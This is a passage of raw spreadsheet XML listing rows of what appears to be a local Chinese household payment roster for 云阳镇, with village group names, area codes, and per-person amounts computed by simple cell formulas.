      <c r="C1393" s="24" t="s">
        <v>3573</v>
      </c>
      <c r="D1393" s="24" t="s">
        <v>3772</v>
      </c>
      <c r="E1393" s="24" t="s">
        <v>3662</v>
      </c>
      <c r="F1393" s="24" t="s">
        <v>3576</v>
      </c>
      <c r="G1393" s="24">
        <v>1</v>
      </c>
      <c r="H1393" s="25">
        <v>365</v>
      </c>
      <c r="I1393" s="24">
        <f t="shared" si="21"/>
        <v>365</v>
      </c>
      <c r="J1393" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1393" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1394" customHeight="1" spans="1:11">
      <c r="A1394" s="23" t="s">
        <v>3773</v>
      </c>
      <c r="B1394" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1394" s="24" t="s">
        <v>3774</v>
      </c>
      <c r="D1394" s="24" t="s">
        <v>3775</v>
      </c>
      <c r="E1394" s="24" t="s">
        <v>3776</v>
      </c>
      <c r="F1394" s="24" t="s">
        <v>3547</v>
      </c>
      <c r="G1394" s="24">
        <v>2</v>
      </c>
      <c r="H1394" s="25">
        <v>325</v>
      </c>
      <c r="I1394" s="24">
        <f t="shared" si="21"/>
        <v>650</v>
      </c>
      <c r="J1394" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1394" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1395" customHeight="1" spans="1:11">
      <c r="A1395" s="23" t="s">
        <v>3777</v>
      </c>
      <c r="B1395" s="24" t="str">
        <f>B1394</f>
        <v>云阳镇</v>
      </c>
      <c r="C1395" s="24" t="str">
        <f>C1394</f>
        <v>小关三组</v>
      </c>
      <c r="D1395" s="23" t="s">
        <v>3778</v>
      </c>
      <c r="E1395" s="23" t="s">
        <v>3779</v>
      </c>
      <c r="F1395" s="24" t="str">
        <f>F1394</f>
        <v>4113210521</v>
      </c>
      <c r="G1395" s="24"/>
      <c r="H1395" s="24"/>
      <c r="I1395" s="24">
        <f t="shared" si="21"/>
        <v>0</v>
      </c>
      <c r="J1395" s="24"/>
      <c r="K1395" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1396" customHeight="1" spans="1:11">
      <c r="A1396" s="23" t="s">
        <v>3780</v>
      </c>
      <c r="B1396" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1396" s="24" t="s">
        <v>3573</v>
      </c>
      <c r="D1396" s="24" t="s">
        <v>3781</v>
      </c>
      <c r="E1396" s="24" t="s">
        <v>3752</v>
      </c>
      <c r="F1396" s="24" t="s">
        <v>3576</v>
      </c>
      <c r="G1396" s="24">
        <v>1</v>
      </c>
      <c r="H1396" s="25">
        <v>365</v>
      </c>
      <c r="I1396" s="24">
        <f t="shared" si="21"/>
        <v>365</v>
      </c>
      <c r="J1396" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1396" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1397" customHeight="1" spans="1:11">
      <c r="A1397" s="23" t="s">
        <v>3782</v>
      </c>
      <c r="B1397" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1397" s="24" t="s">
        <v>3573</v>
      </c>
      <c r="D1397" s="24" t="s">
        <v>3783</v>
      </c>
      <c r="E1397" s="24" t="s">
        <v>3584</v>
      </c>
      <c r="F1397" s="24" t="s">
        <v>3576</v>
      </c>
      <c r="G1397" s="24">
        <v>1</v>
      </c>
      <c r="H1397" s="25">
        <v>365</v>
      </c>
      <c r="I1397" s="24">
        <f t="shared" si="21"/>
        <v>365</v>
      </c>
      <c r="J1397" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1397" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1398" customHeight="1" spans="1:11">
      <c r="A1398" s="23" t="s">
        <v>3784</v>
      </c>
      <c r="B1398" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1398" s="24" t="s">
        <v>3573</v>
      </c>
      <c r="D1398" s="24" t="s">
        <v>3785</v>
      </c>
      <c r="E1398" s="24" t="s">
        <v>3786</v>
      </c>
      <c r="F1398" s="24" t="s">
        <v>3576</v>
      </c>
      <c r="G1398" s="24">
        <v>1</v>
      </c>
      <c r="H1398" s="25">
        <v>365</v>
      </c>
      <c r="I1398" s="24">
        <f t="shared" si="21"/>
        <v>365</v>
      </c>
      <c r="J1398" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1398" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1399" customHeight="1" spans="1:11">
      <c r="A1399" s="23" t="s">
        <v>3787</v>
      </c>
      <c r="B1399" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1399" s="24" t="s">
        <v>3573</v>
      </c>
      <c r="D1399" s="24" t="s">
        <v>3788</v>
      </c>
      <c r="E1399" s="24" t="s">
        <v>3580</v>
      </c>
      <c r="F1399" s="24" t="s">
        <v>3576</v>
      </c>
      <c r="G1399" s="24">
        <v>1</v>
      </c>
      <c r="H1399" s="25">
        <v>365</v>
      </c>
      <c r="I1399" s="24">
        <f t="shared" si="21"/>
        <v>365</v>
      </c>
      <c r="J1399" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1399" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1400" customHeight="1" spans="1:11">
      <c r="A1400" s="23" t="s">
        <v>3789</v>
      </c>
      <c r="B1400" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1400" s="24" t="s">
        <v>3573</v>
      </c>
      <c r="D1400" s="24" t="s">
        <v>3790</v>
      </c>
      <c r="E1400" s="24" t="s">
        <v>3587</v>
      </c>
      <c r="F1400" s="24" t="s">
        <v>3576</v>
      </c>
      <c r="G1400" s="24">
        <v>1</v>
      </c>
      <c r="H1400" s="25">
        <v>365</v>
      </c>
      <c r="I1400" s="24">
        <f t="shared" si="21"/>
        <v>365</v>
      </c>
      <c r="J1400" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1400" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1401" customHeight="1" spans="1:11">
      <c r="A1401" s="23" t="s">
        <v>3791</v>
      </c>
      <c r="B1401" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1401" s="24" t="s">
        <v>3573</v>
      </c>
      <c r="D1401" s="24" t="s">
        <v>3792</v>
      </c>
      <c r="E1401" s="24" t="s">
        <v>3786</v>
      </c>
      <c r="F1401" s="24" t="s">
        <v>3576</v>
      </c>
      <c r="G1401" s="24">
        <v>1</v>
      </c>
      <c r="H1401" s="25">
        <v>365</v>
      </c>
      <c r="I1401" s="24">
        <f t="shared" si="21"/>
        <v>365</v>
      </c>
      <c r="J1401" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1401" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1402" customHeight="1" spans="1:11">
      <c r="A1402" s="23" t="s">
        <v>3793</v>
      </c>
      <c r="B1402" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1402" s="24" t="s">
        <v>3573</v>
      </c>
      <c r="D1402" s="24" t="s">
        <v>3794</v>
      </c>
      <c r="E1402" s="24" t="s">
        <v>3679</v>
      </c>
      <c r="F1402" s="24" t="s">
        <v>3576</v>
      </c>
      <c r="G1402" s="24">
        <v>1</v>
      </c>
      <c r="H1402" s="25">
        <v>365</v>
      </c>
      <c r="I1402" s="24">
        <f t="shared" si="21"/>
        <v>365</v>
      </c>
      <c r="J1402" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1402" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1403" customHeight="1" spans="1:11">
      <c r="A1403" s="23" t="s">
        <v>3795</v>
      </c>
      <c r="B1403" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1403" s="24" t="s">
        <v>3573</v>
      </c>
      <c r="D1403" s="24" t="s">
        <v>3796</v>
      </c>
      <c r="E1403" s="24" t="s">
        <v>3779</v>
      </c>
      <c r="F1403" s="24" t="s">
        <v>3576</v>
      </c>
      <c r="G1403" s="24">
        <v>1</v>
      </c>
      <c r="H1403" s="25">
        <v>365</v>
      </c>
      <c r="I1403" s="24">
        <f t="shared" si="21"/>
        <v>365</v>
      </c>
      <c r="J1403" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1403" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1404" customHeight="1" spans="1:11">
      <c r="A1404" s="23" t="s">
        <v>3797</v>
      </c>
      <c r="B1404" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1404" s="24" t="s">
        <v>3798</v>
      </c>
      <c r="D1404" s="24" t="s">
        <v>3799</v>
      </c>
      <c r="E1404" s="24" t="s">
        <v>2552</v>
      </c>
      <c r="F1404" s="24" t="s">
        <v>3547</v>
      </c>
      <c r="G1404" s="24">
        <v>1</v>
      </c>
      <c r="H1404" s="25">
        <v>365</v>
      </c>
      <c r="I1404" s="24">
        <f t="shared" si="21"/>
        <v>365</v>
      </c>
      <c r="J1404" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1404" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1405" customHeight="1" spans="1:11">
      <c r="A1405" s="23" t="s">
        <v>3800</v>
      </c>
      <c r="B1405" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1405" s="24" t="s">
        <v>3573</v>
      </c>
      <c r="D1405" s="24" t="s">
        <v>3801</v>
      </c>
      <c r="E1405" s="24" t="s">
        <v>3802</v>
      </c>
      <c r="F1405" s="24" t="s">
        <v>3576</v>
      </c>
      <c r="G1405" s="24">
        <v>1</v>
      </c>
      <c r="H1405" s="25">
        <v>365</v>
      </c>
      <c r="I1405" s="24">
        <f t="shared" si="21"/>
        <v>365</v>
      </c>
      <c r="J1405" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1405" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1406" customHeight="1" spans="1:11">
      <c r="A1406" s="23" t="s">
        <v>3803</v>
      </c>
      <c r="B1406" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1406" s="24" t="s">
        <v>3573</v>
      </c>
      <c r="D1406" s="24" t="s">
        <v>3804</v>
      </c>
      <c r="E1406" s="24" t="s">
        <v>3604</v>
      </c>
      <c r="F1406" s="24" t="s">
        <v>3576</v>
      </c>
      <c r="G1406" s="24">
        <v>1</v>
      </c>
      <c r="H1406" s="25">
        <v>365</v>
      </c>
      <c r="I1406" s="24">
        <f t="shared" si="21"/>
        <v>365</v>
      </c>
      <c r="J1406" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1406" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1407" customHeight="1" spans="1:11">
      <c r="A1407" s="23" t="s">
        <v>3805</v>
      </c>
      <c r="B1407" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1407" s="24" t="s">
        <v>3564</v>
      </c>
      <c r="D1407" s="24" t="s">
        <v>3806</v>
      </c>
      <c r="E1407" s="24" t="s">
        <v>3707</v>
      </c>
      <c r="F1407" s="24" t="s">
        <v>3567</v>
      </c>
      <c r="G1407" s="24">
        <v>1</v>
      </c>
      <c r="H1407" s="25">
        <v>365</v>
      </c>
      <c r="I1407" s="24">
        <f t="shared" si="21"/>
        <v>365</v>
      </c>
      <c r="J1407" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1407" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1408" customHeight="1" spans="1:11">
      <c r="A1408" s="23" t="s">
        <v>3807</v>
      </c>
      <c r="B1408" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1408" s="24" t="s">
        <v>3564</v>
      </c>
      <c r="D1408" s="24" t="s">
        <v>3808</v>
      </c>
      <c r="E1408" s="24" t="s">
        <v>3809</v>
      </c>
      <c r="F1408" s="24" t="s">
        <v>3567</v>
      </c>
      <c r="G1408" s="24">
        <v>1</v>
      </c>
      <c r="H1408" s="25">
        <v>365</v>
      </c>
      <c r="I1408" s="24">
        <f t="shared" si="21"/>
        <v>365</v>
      </c>
      <c r="J1408" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1408" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1409" customHeight="1" spans="1:11">
      <c r="A1409" s="23" t="s">
        <v>3810</v>
      </c>
      <c r="B1409" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1409" s="24" t="s">
        <v>3811</v>
      </c>
      <c r="D1409" s="24" t="s">
        <v>3812</v>
      </c>
      <c r="E1409" s="24" t="s">
        <v>3813</v>
      </c>
      <c r="F1409" s="24" t="s">
        <v>3576</v>
      </c>
      <c r="G1409" s="24">
        <v>1</v>
      </c>
      <c r="H1409" s="25">
        <v>365</v>
      </c>
      <c r="I1409" s="24">
        <f t="shared" si="21"/>
        <v>365</v>
      </c>
      <c r="J1409" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1409" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1410" customHeight="1" spans="1:11">
      <c r="A1410" s="23" t="s">
        <v>3814</v>
      </c>
      <c r="B1410" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1410" s="24" t="s">
        <v>3564</v>
      </c>
      <c r="D1410" s="24" t="s">
        <v>3815</v>
      </c>
      <c r="E1410" s="24" t="s">
        <v>2566</v>
      </c>
      <c r="F1410" s="24" t="s">
        <v>3567</v>
      </c>
      <c r="G1410" s="24">
        <v>1</v>
      </c>
      <c r="H1410" s="25">
        <v>365</v>
      </c>
      <c r="I1410" s="24">
        <f t="shared" si="21"/>
        <v>365</v>
      </c>
      <c r="J1410" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1410" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1411" customHeight="1" spans="1:11">
      <c r="A1411" s="23" t="s">
        <v>3816</v>
      </c>
      <c r="B1411" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1411" s="24" t="s">
        <v>3573</v>
      </c>
      <c r="D1411" s="24" t="s">
        <v>3817</v>
      </c>
      <c r="E1411" s="24" t="s">
        <v>3695</v>
      </c>
      <c r="F1411" s="24" t="s">
        <v>3576</v>
      </c>
      <c r="G1411" s="24">
        <v>1</v>
      </c>
      <c r="H1411" s="25">
        <v>365</v>
      </c>
      <c r="I1411" s="24">
        <f t="shared" si="21"/>
        <v>365</v>
      </c>
      <c r="J1411" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1411" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1412" customHeight="1" spans="1:11">
      <c r="A1412" s="23" t="s">
        <v>3818</v>
      </c>
      <c r="B1412" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1412" s="24" t="s">
        <v>3573</v>
      </c>
      <c r="D1412" s="24" t="s">
        <v>3819</v>
      </c>
      <c r="E1412" s="24" t="s">
        <v>3601</v>
      </c>
      <c r="F1412" s="24" t="s">
        <v>3576</v>
      </c>
      <c r="G1412" s="24">
        <v>1</v>
      </c>
      <c r="H1412" s="25">
        <v>365</v>
      </c>
      <c r="I1412" s="24">
        <f t="shared" ref="I1412:I1475" si="22">H1412*G1412</f>
        <v>365</v>
      </c>
      <c r="J1412" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1412" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1413" customHeight="1" spans="1:11">
      <c r="A1413" s="23" t="s">
        <v>3820</v>
      </c>
      <c r="B1413" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1413" s="24" t="s">
        <v>3578</v>
      </c>
      <c r="D1413" s="24" t="s">
        <v>3821</v>
      </c>
      <c r="E1413" s="24" t="s">
        <v>3738</v>
      </c>
      <c r="F1413" s="24" t="s">
        <v>3581</v>
      </c>
      <c r="G1413" s="24">
        <v>1</v>
      </c>
      <c r="H1413" s="25">
        <v>365</v>
      </c>
      <c r="I1413" s="24">
        <f t="shared" si="22"/>
        <v>365</v>
      </c>
      <c r="J1413" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1413" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1414" customHeight="1" spans="1:11">
      <c r="A1414" s="23" t="s">
        <v>3822</v>
      </c>
      <c r="B1414" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1414" s="24" t="s">
        <v>3573</v>
      </c>
      <c r="D1414" s="24" t="s">
        <v>3823</v>
      </c>
      <c r="E1414" s="24" t="s">
        <v>3594</v>
      </c>
      <c r="F1414" s="24" t="s">
        <v>3576</v>
      </c>
      <c r="G1414" s="24">
        <v>1</v>
      </c>
      <c r="H1414" s="25">
        <v>365</v>
      </c>
      <c r="I1414" s="24">
        <f t="shared" si="22"/>
        <v>365</v>
      </c>
      <c r="J1414" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1414" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1415" customHeight="1" spans="1:11">
      <c r="A1415" s="23" t="s">
        <v>3824</v>
      </c>
      <c r="B1415" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1415" s="24" t="s">
        <v>3578</v>
      </c>
      <c r="D1415" s="24" t="s">
        <v>3825</v>
      </c>
      <c r="E1415" s="24" t="s">
        <v>3826</v>
      </c>
      <c r="F1415" s="24" t="s">
        <v>3581</v>
      </c>
      <c r="G1415" s="24">
        <v>1</v>
      </c>
      <c r="H1415" s="25">
        <v>365</v>
      </c>
      <c r="I1415" s="24">
        <f t="shared" si="22"/>
        <v>365</v>
      </c>
      <c r="J1415" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1415" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1416" customHeight="1" spans="1:11">
      <c r="A1416" s="23" t="s">
        <v>3827</v>
      </c>
      <c r="B1416" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1416" s="24" t="s">
        <v>3589</v>
      </c>
      <c r="D1416" s="24" t="s">
        <v>3828</v>
      </c>
      <c r="E1416" s="24" t="s">
        <v>3829</v>
      </c>
      <c r="F1416" s="24" t="s">
        <v>3581</v>
      </c>
      <c r="G1416" s="24">
        <v>1</v>
      </c>
      <c r="H1416" s="25">
        <v>365</v>
      </c>
      <c r="I1416" s="24">
        <f t="shared" si="22"/>
        <v>365</v>
      </c>
      <c r="J1416" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1416" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1417" customHeight="1" spans="1:11">
      <c r="A1417" s="23" t="s">
        <v>3830</v>
      </c>
      <c r="B1417" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1417" s="24" t="s">
        <v>3798</v>
      </c>
      <c r="D1417" s="24" t="s">
        <v>3831</v>
      </c>
      <c r="E1417" s="24" t="s">
        <v>3832</v>
      </c>
      <c r="F1417" s="24" t="s">
        <v>3547</v>
      </c>
      <c r="G1417" s="24">
        <v>1</v>
      </c>
      <c r="H1417" s="25">
        <v>365</v>
      </c>
      <c r="I1417" s="24">
        <f t="shared" si="22"/>
        <v>365</v>
      </c>
      <c r="J1417" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1417" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1418" customHeight="1" spans="1:11">
      <c r="A1418" s="23" t="s">
        <v>3833</v>
      </c>
      <c r="B1418" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1418" s="24" t="s">
        <v>3615</v>
      </c>
      <c r="D1418" s="24" t="s">
        <v>3834</v>
      </c>
      <c r="E1418" s="24" t="s">
        <v>2494</v>
      </c>
      <c r="F1418" s="24" t="s">
        <v>3567</v>
      </c>
      <c r="G1418" s="24">
        <v>2</v>
      </c>
      <c r="H1418" s="25">
        <v>355</v>
      </c>
      <c r="I1418" s="24">
        <f t="shared" si="22"/>
        <v>710</v>
      </c>
      <c r="J1418" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1418" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1419" customHeight="1" spans="1:11">
      <c r="A1419" s="23" t="s">
        <v>3835</v>
      </c>
      <c r="B1419" s="24" t="str">
        <f>B1418</f>
        <v>云阳镇</v>
      </c>
      <c r="C1419" s="24" t="str">
        <f>C1418</f>
        <v>大关十组</v>
      </c>
      <c r="D1419" s="54" t="s">
        <v>3836</v>
      </c>
      <c r="E1419" s="55" t="s">
        <v>866</v>
      </c>
      <c r="F1419" s="24" t="str">
        <f>F1418</f>
        <v>4113210522</v>
      </c>
      <c r="G1419" s="24"/>
      <c r="H1419" s="24"/>
      <c r="I1419" s="24">
        <f t="shared" si="22"/>
        <v>0</v>
      </c>
      <c r="J1419" s="24"/>
      <c r="K1419" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1420" customHeight="1" spans="1:11">
      <c r="A1420" s="23" t="s">
        <v>3837</v>
      </c>
      <c r="B1420" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1420" s="24" t="s">
        <v>3564</v>
      </c>
      <c r="D1420" s="24" t="s">
        <v>3838</v>
      </c>
      <c r="E1420" s="24" t="s">
        <v>3839</v>
      </c>
      <c r="F1420" s="24" t="s">
        <v>3567</v>
      </c>
      <c r="G1420" s="24">
        <v>1</v>
      </c>
      <c r="H1420" s="25">
        <v>365</v>
      </c>
      <c r="I1420" s="24">
        <f t="shared" si="22"/>
        <v>365</v>
      </c>
      <c r="J1420" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1420" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1421" customHeight="1" spans="1:11">
      <c r="A1421" s="23" t="s">
        <v>3840</v>
      </c>
      <c r="B1421" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1421" s="24" t="s">
        <v>3569</v>
      </c>
      <c r="D1421" s="24" t="s">
        <v>3841</v>
      </c>
      <c r="E1421" s="24" t="s">
        <v>2962</v>
      </c>
      <c r="F1421" s="24" t="s">
        <v>3547</v>
      </c>
      <c r="G1421" s="24">
        <v>1</v>
      </c>
      <c r="H1421" s="25">
        <v>365</v>
      </c>
      <c r="I1421" s="24">
        <f t="shared" si="22"/>
        <v>365</v>
      </c>
      <c r="J1421" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1421" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1422" customHeight="1" spans="1:11">
      <c r="A1422" s="23" t="s">
        <v>3842</v>
      </c>
      <c r="B1422" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1422" s="24" t="s">
        <v>3843</v>
      </c>
      <c r="D1422" s="24" t="s">
        <v>3844</v>
      </c>
      <c r="E1422" s="24" t="s">
        <v>3845</v>
      </c>
      <c r="F1422" s="24" t="s">
        <v>3656</v>
      </c>
      <c r="G1422" s="24">
        <v>1</v>
      </c>
      <c r="H1422" s="25">
        <v>365</v>
      </c>
      <c r="I1422" s="24">
        <f t="shared" si="22"/>
        <v>365</v>
      </c>
      <c r="J1422" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1422" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1423" customHeight="1" spans="1:11">
      <c r="A1423" s="23" t="s">
        <v>3846</v>
      </c>
      <c r="B1423" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1423" s="24" t="s">
        <v>3573</v>
      </c>
      <c r="D1423" s="24" t="s">
        <v>3847</v>
      </c>
      <c r="E1423" s="24" t="s">
        <v>3848</v>
      </c>
      <c r="F1423" s="24" t="s">
        <v>3576</v>
      </c>
      <c r="G1423" s="24">
        <v>1</v>
      </c>
      <c r="H1423" s="25">
        <v>365</v>
      </c>
      <c r="I1423" s="24">
        <f t="shared" si="22"/>
        <v>365</v>
      </c>
      <c r="J1423" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1423" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1424" customHeight="1" spans="1:11">
      <c r="A1424" s="23" t="s">
        <v>3849</v>
      </c>
      <c r="B1424" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1424" s="24" t="s">
        <v>3639</v>
      </c>
      <c r="D1424" s="24" t="s">
        <v>3850</v>
      </c>
      <c r="E1424" s="24" t="s">
        <v>3727</v>
      </c>
      <c r="F1424" s="24" t="s">
        <v>3576</v>
      </c>
      <c r="G1424" s="24">
        <v>1</v>
      </c>
      <c r="H1424" s="25">
        <v>365</v>
      </c>
      <c r="I1424" s="24">
        <f t="shared" si="22"/>
        <v>365</v>
      </c>
      <c r="J1424" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1424" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1425" customHeight="1" spans="1:12">
      <c r="A1425" s="23" t="s">
        <v>3851</v>
      </c>
      <c r="B1425" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1425" s="24" t="s">
        <v>3589</v>
      </c>
      <c r="D1425" s="24" t="s">
        <v>3852</v>
      </c>
      <c r="E1425" s="24" t="s">
        <v>3704</v>
      </c>
      <c r="F1425" s="24" t="s">
        <v>3581</v>
      </c>
      <c r="G1425" s="24">
        <v>2</v>
      </c>
      <c r="H1425" s="25">
        <v>325</v>
      </c>
      <c r="I1425" s="24">
        <f t="shared" si="22"/>
        <v>650</v>
      </c>
      <c r="J1425" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1425" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1426" s="4" customFormat="1" ht="21" customHeight="1" spans="1:12">
      <c r="A1426" s="23" t="s">
        <v>3853</v>
      </c>
      <c r="B1426" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1426" s="24" t="s">
        <v>3589</v>
      </c>
      <c r="D1426" s="24" t="s">
        <v>3854</v>
      </c>
      <c r="E1426" s="24" t="s">
        <v>3855</v>
      </c>
      <c r="F1426" s="24" t="s">
        <v>3581</v>
      </c>
      <c r="G1426" s="24"/>
      <c r="H1426" s="24"/>
      <c r="I1426" s="24">
        <f t="shared" si="22"/>
        <v>0</v>
      </c>
      <c r="J1426" s="5" t="s">
        <v>1242</v>
      </c>
      <c r="K1426" s="24" t="s">
        <v>225</v>
      </c>
      <c r="L1426" s="8"/>
    </row>
    <row r="1427" customHeight="1" spans="1:12">
      <c r="A1427" s="23" t="s">
        <v>3856</v>
      </c>
      <c r="B1427" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1427" s="24" t="s">
        <v>3573</v>
      </c>
      <c r="D1427" s="24" t="s">
        <v>3857</v>
      </c>
      <c r="E1427" s="24" t="s">
        <v>3637</v>
      </c>
      <c r="F1427" s="24" t="s">
        <v>3576</v>
      </c>
      <c r="G1427" s="24">
        <v>2</v>
      </c>
      <c r="H1427" s="25">
        <v>325</v>
      </c>
      <c r="I1427" s="24">
        <f t="shared" si="22"/>
        <v>650</v>
      </c>
      <c r="J1427" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1427" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1428" customHeight="1" spans="1:12">
      <c r="A1428" s="23" t="s">
        <v>3858</v>
      </c>
      <c r="B1428" s="24" t="str">
        <f>B1427</f>
        <v>云阳镇</v>
      </c>
      <c r="C1428" s="24" t="str">
        <f>C1427</f>
        <v>南召店袁庄</v>
      </c>
      <c r="D1428" s="23" t="s">
        <v>3859</v>
      </c>
      <c r="E1428" s="23" t="s">
        <v>3707</v>
      </c>
      <c r="F1428" s="24" t="str">
        <f>F1427</f>
        <v>4113210519</v>
      </c>
      <c r="G1428" s="24"/>
      <c r="H1428" s="24"/>
      <c r="I1428" s="24">
        <f t="shared" si="22"/>
        <v>0</v>
      </c>
      <c r="J1428" s="24"/>
      <c r="K1428" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1429" customHeight="1" spans="1:12">
      <c r="A1429" s="23" t="s">
        <v>3860</v>
      </c>
      <c r="B1429" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1429" s="24" t="s">
        <v>3573</v>
      </c>
      <c r="D1429" s="24" t="s">
        <v>3861</v>
      </c>
      <c r="E1429" s="24" t="s">
        <v>3862</v>
      </c>
      <c r="F1429" s="24" t="s">
        <v>3576</v>
      </c>
      <c r="G1429" s="24">
        <v>1</v>
      </c>
      <c r="H1429" s="25">
        <v>365</v>
      </c>
      <c r="I1429" s="24">
        <f t="shared" si="22"/>
        <v>365</v>
      </c>
      <c r="J1429" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1429" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1430" customHeight="1" spans="1:12">
      <c r="A1430" s="23" t="s">
        <v>3863</v>
      </c>
      <c r="B1430" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1430" s="24" t="s">
        <v>3573</v>
      </c>
      <c r="D1430" s="24" t="s">
        <v>3864</v>
      </c>
      <c r="E1430" s="24" t="s">
        <v>3637</v>
      </c>
      <c r="F1430" s="24" t="s">
        <v>3576</v>
      </c>
      <c r="G1430" s="24">
        <v>2</v>
      </c>
      <c r="H1430" s="25">
        <v>325</v>
      </c>
      <c r="I1430" s="24">
        <f t="shared" si="22"/>
        <v>650</v>
      </c>
      <c r="J1430" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1430" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1431" customHeight="1" spans="1:12">
      <c r="A1431" s="23" t="s">
        <v>3865</v>
      </c>
      <c r="B1431" s="24" t="str">
        <f>B1430</f>
        <v>云阳镇</v>
      </c>
      <c r="C1431" s="24" t="str">
        <f>C1430</f>
        <v>南召店袁庄</v>
      </c>
      <c r="D1431" s="23" t="s">
        <v>3866</v>
      </c>
      <c r="E1431" s="23" t="s">
        <v>3594</v>
      </c>
      <c r="F1431" s="24" t="str">
        <f>F1430</f>
        <v>4113210519</v>
      </c>
